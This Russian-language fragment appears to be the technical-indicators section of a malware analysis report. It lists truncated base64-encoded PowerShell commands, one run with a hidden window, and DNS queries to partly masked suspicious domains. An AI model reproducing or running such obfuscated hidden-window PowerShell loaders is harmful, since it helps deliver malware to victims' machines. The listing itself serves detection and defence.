Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBwAHcAZgA9ACcAQwBvAG0AbwByAG8AcwBvAHYAdgAnADsAJABTAHkAbgBlAHIAZwBpAHoAZQB...
- DNS ASK ba#####sanminhmanh.com
- DNS ASK en####rismo.info
- DNS ASK st#####tstudiosco.com
- DNS ASK he#####fbusiness.com
- DNS ASK ke##.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABlAGMAbwBtAG0AZQByAGMAZQBwAHcAZgA9ACcAQwBvAG0AbwByAG8AcwBvAHYAdgAnADsAJABTAHkAbgBlAHIAZwBpAHoAZQB...' (со скрытым окном)